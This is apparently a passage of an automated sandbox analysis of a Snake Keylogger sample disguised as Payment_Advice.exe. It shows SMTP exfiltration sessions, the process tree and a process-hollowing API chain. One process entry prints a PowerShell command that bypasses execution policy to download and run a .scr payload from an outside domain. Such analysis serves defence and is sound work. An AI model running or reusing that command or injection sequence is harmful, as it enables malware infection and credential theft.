                                                    May 1, 2024 15:18:38.628559113 CEST58749746108.167.142.65192.168.2.7250 OK
                                                    May 1, 2024 15:18:38.628998995 CEST49746587192.168.2.7108.167.142.65RCPT TO:<receive@qoldenfrontier.com>
                                                    May 1, 2024 15:18:38.824045897 CEST58749746108.167.142.65192.168.2.7250 Accepted
                                                    May 1, 2024 15:18:38.824176073 CEST49746587192.168.2.7108.167.142.65DATA
                                                    May 1, 2024 15:18:39.012978077 CEST58749746108.167.142.65192.168.2.7354 Enter message, ending with "." on a line by itself
                                                    May 1, 2024 15:18:39.013290882 CEST49746587192.168.2.7108.167.142.65.
                                                    May 1, 2024 15:18:39.199729919 CEST58749746108.167.142.65192.168.2.7250 OK id=1s29r4-002MnQ-2x
                                                    May 1, 2024 15:18:39.203257084 CEST49746587192.168.2.7108.167.142.65QUIT
                                                    May 1, 2024 15:18:39.590287924 CEST58749746108.167.142.65192.168.2.7221 gator4175.hostgator.com closing connection
                                                    May 1, 2024 15:18:39.994204998 CEST58749747108.167.142.65192.168.2.7220-gator4175.hostgator.com ESMTP Exim 4.96.2 #2 Wed, 01 May 2024 08:18:39 -0500
                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                    220 and/or bulk e-mail.
                                                    May 1, 2024 15:18:39.994446993 CEST49747587192.168.2.7108.167.142.65EHLO 124406
                                                    May 1, 2024 15:18:40.180181980 CEST58749747108.167.142.65192.168.2.7250-gator4175.hostgator.com Hello 124406 [149.18.24.96]
                                                    250-SIZE 52428800
                                                    250-8BITMIME
                                                    250-PIPELINING
                                                    250-PIPECONNECT
                                                    250-AUTH PLAIN LOGIN
                                                    250-STARTTLS
                                                    250 HELP
                                                    May 1, 2024 15:18:40.180356026 CEST49747587192.168.2.7108.167.142.65AUTH login dGVzdEBxb2xkZW5mcm9udGllci5jb20=
                                                    May 1, 2024 15:18:40.366153955 CEST58749747108.167.142.65192.168.2.7334 UGFzc3dvcmQ6
                                                    May 1, 2024 15:18:40.556767941 CEST58749747108.167.142.65192.168.2.7235 Authentication succeeded
                                                    May 1, 2024 15:18:40.557101965 CEST49747587192.168.2.7108.167.142.65MAIL FROM:<test@qoldenfrontier.com>
                                                    May 1, 2024 15:18:40.741717100 CEST58749747108.167.142.65192.168.2.7250 OK
                                                    May 1, 2024 15:18:40.741892099 CEST49747587192.168.2.7108.167.142.65RCPT TO:<receive@qoldenfrontier.com>
                                                    May 1, 2024 15:18:40.938692093 CEST58749747108.167.142.65192.168.2.7250 Accepted
                                                    May 1, 2024 15:18:40.941020966 CEST49747587192.168.2.7108.167.142.65DATA
                                                    May 1, 2024 15:18:41.125916004 CEST58749747108.167.142.65192.168.2.7354 Enter message, ending with "." on a line by itself
                                                    May 1, 2024 15:18:41.126355886 CEST49747587192.168.2.7108.167.142.65.
                                                    May 1, 2024 15:18:41.312248945 CEST58749747108.167.142.65192.168.2.7250 OK id=1s29r7-002MpA-06
                                                    May 1, 2024 15:18:41.312752962 CEST49747587192.168.2.7108.167.142.65QUIT
                                                    May 1, 2024 15:18:41.698955059 CEST58749747108.167.142.65192.168.2.7221 gator4175.hostgator.com closing connection

                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:15:17:03
                                                    Start date:01/05/2024
                                                    Path:C:\Users\user\Desktop\Payment_Advice.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\Payment_Advice.exe"
                                                    Imagebase:0xc30000
                                                    File size:957'952 bytes
                                                    MD5 hash:E708AA3160E224DE971421D5BC2FEE29
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000000.00000002.1198685438.0000000005590000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:2
                                                    Start time:15:17:03
                                                    Start date:01/05/2024
                                                    Path:C:\Users\user\Desktop\Payment_Advice.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\Payment_Advice.exe"
                                                    Imagebase:0xe50000
                                                    File size:957'952 bytes
                                                    MD5 hash:E708AA3160E224DE971421D5BC2FEE29
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:15:17:03
                                                    Start date:01/05/2024
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo
                                                    Imagebase:0x7ff663df0000
                                                    File size:170'496 bytes
                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:4
                                                    Start time:15:17:04
                                                    Start date:01/05/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"
                                                    Imagebase:0x7ff741d30000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:5
                                                    Start time:15:17:04
                                                    Start date:01/05/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff75da10000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:6
                                                    Start time:15:17:08
                                                    Start date:01/05/2024
                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Payment_Advice.pdf"
                                                    Imagebase:0x7ff702560000
                                                    File size:5'641'176 bytes
                                                    MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:false

                                                    General

                                                    Target ID:7
                                                    Start time:15:17:08
                                                    Start date:01/05/2024
                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                    Imagebase:0x7ff6c3ff0000
                                                    File size:3'581'912 bytes
                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:false

                                                    General

                                                    Target ID:8
                                                    Start time:15:17:08
                                                    Start date:01/05/2024
                                                    Path:C:\Windows\System32\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                    Imagebase:0x7ff7b4ee0000
                                                    File size:55'320 bytes
                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:9
                                                    Start time:15:17:08
                                                    Start date:01/05/2024
                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1700,i,16204253092957558570,3256571588782708314,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                    Imagebase:0x7ff6c3ff0000
                                                    File size:3'581'912 bytes
                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:false

                                                    General

                                                    Target ID:23
                                                    Start time:15:17:22
                                                    Start date:01/05/2024
                                                    Path:C:\Windows\Temp\hadvices.scr
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\Temp\hadvices.scr" /S
                                                    Imagebase:0x990000
                                                    File size:1'041'408 bytes
                                                    MD5 hash:012DE24142F859797FBB5A25A7A3290D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Windows\Temp\hadvices.scr, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 71%, ReversingLabs
                                                    • Detection: 35%, Virustotal, Browse
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:25
                                                    Start time:15:17:23
                                                    Start date:01/05/2024
                                                    Path:C:\Windows\Temp\hadvices.scr
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\Temp\hadvices.scr"
                                                    Imagebase:0xe80000
                                                    File size:1'041'408 bytes
                                                    MD5 hash:012DE24142F859797FBB5A25A7A3290D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000019.00000002.2455454438.0000000003419000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000019.00000002.2455454438.0000000003131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:false

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:5.7%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:76%
                                                      Total number of Nodes:25
                                                      Total number of Limit Nodes:1
                                                      execution_graph 11390 145a968 11392 145a982 11390->11392 11391 145a9d2 11392->11391 11394 145aa28 11392->11394 11395 145aa5b 11394->11395 11414 1459b1c 11395->11414 11397 145ac32 11398 1459b28 Wow64GetThreadContext 11397->11398 11399 145ad2c 11397->11399 11398->11399 11400 1459b40 ReadProcessMemory 11399->11400 11401 145ae0c 11400->11401 11409 145a758 VirtualAllocEx 11401->11409 11402 145af29 11408 145a600 WriteProcessMemory 11402->11408 11403 145b208 11412 145a600 WriteProcessMemory 11403->11412 11404 145b00d 11404->11403 11410 145a600 WriteProcessMemory 11404->11410 11405 145b246 11406 145b32e 11405->11406 11411 145a4d8 Wow64SetThreadContext 11405->11411 11413 145a878 ResumeThread 11406->11413 11407 145b3eb 11407->11392 11408->11404 11409->11402 11410->11404 11411->11406 11412->11405 11413->11407 11415 145b558 CreateProcessW 11414->11415 11417 145b73e 11415->11417

                                                      Executed Functions

                                                      Function 01459150 Relevance: 2.8, Strings: 2, Instructions: 260COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 1459150-145915d 1 1459166-1459176 0->1 2 145915f-1459161 0->2 4 145917d-145918d 1->4 5 1459178 1->5 3 1459405-145940c 2->3 7 1459193-14591a1 4->7 8 14593ec-14593fa 4->8 5->3 11 14591a7 7->11 12 145940d-1459486 7->12 8->12 13 14593fc-1459400 call 14588d8 8->13 11->12 14 14591c5-14591e6 11->14 15 1459284-14592a5 11->15 16 1459304-1459341 11->16 17 1459346-145936c 11->17 18 14593e0-14593ea 11->18 19 14591ae-14591c0 11->19 20 14591eb-145920d 11->20 21 14592aa-14592d2 11->21 22 14592d7-14592ff 11->22 23 1459371-145939d 11->23 24 1459212-1459233 11->24 25 14593bc-14593de 11->25 26 145939f-14593ba call 14503e0 11->26 27 145925e-145927f 11->27 28 1459238-1459259 11->28 13->3 14->3 15->3 16->3 17->3 18->3 19->3 20->3 21->3 22->3 23->3 24->3 25->3 26->3 27->3 28->3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1198258163.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1450000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Xq$$q
                                                      • API String ID: 0-855381642
                                                      • Opcode ID: f4e46067ad0589cbf3d00dbdb4d3451056e5b93ddccf0e97770307a89f8b70c8
                                                      • Instruction ID: 33947bda3caf0f31b3e8ebef7b8c28322afb61e4989329103b9e6110ccb41066
                                                      • Opcode Fuzzy Hash: f4e46067ad0589cbf3d00dbdb4d3451056e5b93ddccf0e97770307a89f8b70c8
                                                      • Instruction Fuzzy Hash: 54816234F04219DBDB58EF79945467E7BB7BBC9300B05852EE406EB296DE389C028791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0145AA28 Relevance: 1.9, Strings: 1, Instructions: 615COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 111 145aa28-145aa59 112 145aa60-145abe6 111->112 113 145aa5b 111->113 120 145ac0d-145ac52 call 1459b1c 112->120 121 145abe8-145ac0c 112->121 113->112 125 145ac54-145ac70 120->125 126 145ac7b-145ace5 120->126 121->120 125->126 132 145ace7 126->132 133 145acec-145ad18 126->133 132->133 135 145ad79-145adab call 1459b34 133->135 136 145ad1a-145ad27 call 1459b28 133->136 141 145add4 135->141 142 145adad-145adc9 135->142 140 145ad2c-145ad4c 136->140 143 145ad75-145ad77 140->143 144 145ad4e-145ad6a 140->144 145 145add5-145addf 141->145 142->141 143->145 144->143 146 145ade6-145ae2c call 1459b40 145->146 147 145ade1 145->147 154 145ae55-145ae6e 146->154 155 145ae2e-145ae4a 146->155 147->146 156 145aec6-145af3e call 145a758 154->156 157 145ae70-145ae9c call 1459b4c 154->157 155->154 169 145af40-145af51 156->169 170 145af53-145af55 156->170 163 145aec5 157->163 164 145ae9e-145aeba 157->164 163->156 164->163 171 145af5b-145af6f 169->171 170->171 172 145af71-145afab 171->172 173 145afac-145afc3 171->173 172->173 174 145afc5-145afe1 173->174 175 145afec-145b02d call 145a600 173->175 174->175 179 145b056-145b08b 175->179 180 145b02f-145b04b 175->180 184 145b1e3-145b202 179->184 180->179 186 145b090-145b114 184->186 187 145b208-145b266 call 145a600 184->187 197 145b1d8-145b1dd 186->197 198 145b11a-145b18c call 145a600 186->198 192 145b28f-145b2c2 187->192 193 145b268-145b284 187->193 199 145b2c4-145b2cb 192->199 200 145b2cc-145b2df 192->200 193->192 197->184 209 145b18e-145b1ae 198->209 199->200 202 145b2e6-145b311 200->202 203 145b2e1 200->203 207 145b313-145b32c call 145a4d8 202->207 208 145b37b-145b3ad call 1459b58 202->208 203->202 211 145b32e-145b34e 207->211 217 145b3d6 208->217 218 145b3af-145b3cb 208->218 212 145b1d7 209->212 213 145b1b0-145b1cc 209->213 215 145b377-145b379 211->215 216 145b350-145b36c 211->216 212->197 213->212 220 145b3d7-145b3e9 call 145a878 215->220 216->215 217->220 218->217 224 145b3eb-145b40b 220->224 227 145b434-145b53d 224->227 228 145b40d-145b429 224->228 228->227
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1198258163.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1450000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (
                                                      • API String ID: 0-3887548279
                                                      • Opcode ID: 2a9926d68b860c10a0a6149825202fd846c88da0b6141fbbc6701887cd3c9b65
                                                      • Instruction ID: e0189099e6763574ef5f0edc54e0b57b1dfe076b64099cc4870334327a03970a
                                                      • Opcode Fuzzy Hash: 2a9926d68b860c10a0a6149825202fd846c88da0b6141fbbc6701887cd3c9b65
                                                      • Instruction Fuzzy Hash: C452D271D012288FEB68DF69C944BDDBBB2BF89300F5481EAD509A72A1DB345E85CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01459B1C Relevance: 1.7, APIs: 1, Instructions: 223processCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 239 1459b1c-145b5e3 241 145b5e5-145b5f7 239->241 242 145b5fa-145b608 239->242 241->242 243 145b61f-145b65b 242->243 244 145b60a-145b61c 242->244 245 145b65d-145b66c 243->245 246 145b66f-145b73c CreateProcessW 243->246 244->243 245->246 250 145b745-145b804 246->250 251 145b73e-145b744 246->251 261 145b806-145b82f 250->261 262 145b83a-145b845 250->262 251->250 261->262
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0145B729
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1198258163.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1450000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 028128b288c2dab07ae1e5d12ff84cccab7eb6ad097bf26c5c4c0d3b18fe9969
                                                      • Instruction ID: 7841fb73d929a0e17d93825606279a726b4e0540a97aa33ab80ca83d6d91ff59
                                                      • Opcode Fuzzy Hash: 028128b288c2dab07ae1e5d12ff84cccab7eb6ad097bf26c5c4c0d3b18fe9969
                                                      • Instruction Fuzzy Hash: D781D274C0026DCFDB65DFA9C884BEDBBF5AB09300F1491AAE509B7260DB309A85CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0145A600 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 266 145a600-145a66b 268 145a682-145a6e3 WriteProcessMemory 266->268 269 145a66d-145a67f 266->269 271 145a6e5-145a6eb 268->271 272 145a6ec-145a73e 268->272 269->268 271->272
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0145A6D3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1198258163.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1450000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 032dc31ec779d5f4a7611c50b4debfa84cf15d94b962174fee125d50f496a3fb
                                                      • Instruction ID: 8119bb5b9032fc3e426b1efd94fb5fe2959df80f494b47f2bed952b2c94b78fc
                                                      • Opcode Fuzzy Hash: 032dc31ec779d5f4a7611c50b4debfa84cf15d94b962174fee125d50f496a3fb
                                                      • Instruction Fuzzy Hash: 8741AAB4D012589FDF10CFA9D984ADEFBF1BB49310F24902AE819B7250D735AA45CF64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01459B40 Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 277 1459b40-145ba45 ReadProcessMemory 279 145ba47-145ba4d 277->279 280 145ba4e-145ba8c 277->280 279->280
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0145BA35
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1198258163.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1450000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 43afc56c0cde75e9d54b4ffb680556ac957c7a547ca927f1fcc216921a031e1e
                                                      • Instruction ID: 95b6e6f19ff5ae729dbd07132e8bd029a1aa763b47c8325089e4c275f0eead4f
                                                      • Opcode Fuzzy Hash: 43afc56c0cde75e9d54b4ffb680556ac957c7a547ca927f1fcc216921a031e1e
                                                      • Instruction Fuzzy Hash: 4C4155B9D042589FCF10CFAAD984AEEFBB5FB19310F10A02AE914B7211D375A945CF64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0145A758 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 283 145a758-145a812 VirtualAllocEx 286 145a814-145a81a 283->286 287 145a81b-145a865 283->287 286->287
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0145A802
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1198258163.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1450000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: c0cbbb66325871432ec4d524300d8a5deb512a72bc55424b9a10958cba1e56ce
                                                      • Instruction ID: cf35f8b1aca33b2ded2c44190530107c406adfbf26bfc99afb6ec83326e072df
                                                      • Opcode Fuzzy Hash: c0cbbb66325871432ec4d524300d8a5deb512a72bc55424b9a10958cba1e56ce
                                                      • Instruction Fuzzy Hash: D73197B8D002589FCF14CFA9D984ADEFBB1BB49310F20942AE915B7310D735A906CF68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0145A4D8 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 292 145a4d8-145a538 294 145a54f-145a597 Wow64SetThreadContext 292->294 295 145a53a-145a54c 292->295 297 145a5a0-145a5ec 294->297 298 145a599-145a59f 294->298 295->294 298->297
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0145A587
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1198258163.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1450000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: d28296fe40fe28928a68b98342da80f7fd841f8f38707ce2ef0709ab02a54f1d
                                                      • Instruction ID: 6099de91095a0f72a8754504d234765629468ce3cbc5d08377bb529f1d907577
                                                      • Opcode Fuzzy Hash: d28296fe40fe28928a68b98342da80f7fd841f8f38707ce2ef0709ab02a54f1d
                                                      • Instruction Fuzzy Hash: 8631BBB4D012589FDB14DFAAD884AEEFBF1BB49314F24802AE815B7250D738AA45CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01459B28 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 303 1459b28-145b8d4 305 145b8d6-145b8e8 303->305 306 145b8eb-145b932 Wow64GetThreadContext 303->306 305->306 307 145b934-145b93a 306->307 308 145b93b-145b973 306->308 307->308
                                                      APIs
                                                      • Wow64GetThreadContext.KERNEL32(?,?), ref: 0145B922
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1198258163.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1450000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: db11963364c8a88a4ff73d0cc4453bb38a300887ecdb8785793a4883e9dd8cbf
                                                      • Instruction ID: fab35b85961a111f0265d988b9849ac5b9456c636c4e1d36898082402b211618
                                                      • Opcode Fuzzy Hash: db11963364c8a88a4ff73d0cc4453bb38a300887ecdb8785793a4883e9dd8cbf
                                                      • Instruction Fuzzy Hash: 6331ABB4D012589FCB10DFAAD884AEEFBF2EB08310F14902AE814B7351D378A945CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0145A878 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 311 145a878-145a906 ResumeThread 314 145a90f-145a951 311->314 315 145a908-145a90e 311->315 315->314
                                                      APIs
                                                      • ResumeThread.KERNELBASE(?), ref: 0145A8F6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1198258163.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1450000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: dde35eaccbd08cb852fdf7f7bd395dc94dd028b336fdc36d8bc8ea937eb2996d
                                                      • Instruction ID: 9ee35f9fcd8afab3d89ce118360c2296cdd0b243961f38bbd350ff3bca80cab1
                                                      • Opcode Fuzzy Hash: dde35eaccbd08cb852fdf7f7bd395dc94dd028b336fdc36d8bc8ea937eb2996d
                                                      • Instruction Fuzzy Hash: 1431CAB4D012189FCB14CFAAD880ADEFBF5BB49310F20942AE815B7310C735A902CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 013DD5B8 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1197831107.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_13dd000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
